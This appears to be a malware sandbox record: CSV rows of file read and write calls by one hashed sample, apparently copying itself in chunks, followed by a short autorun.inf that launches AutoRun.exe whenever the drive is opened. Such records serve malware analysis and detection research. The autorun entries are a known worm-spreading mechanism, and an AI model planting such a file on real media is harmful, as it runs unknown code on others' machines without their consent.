"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->9614"
420.csv
[autorun]
open=AutoRun.exe
shell\1=Open
shell\1\Command=AutoRun.exe
shell\2\=Browser
shell\2\Command=AutoRun.exe
shellexecute=AutoRun.exe
AUTORUN.INF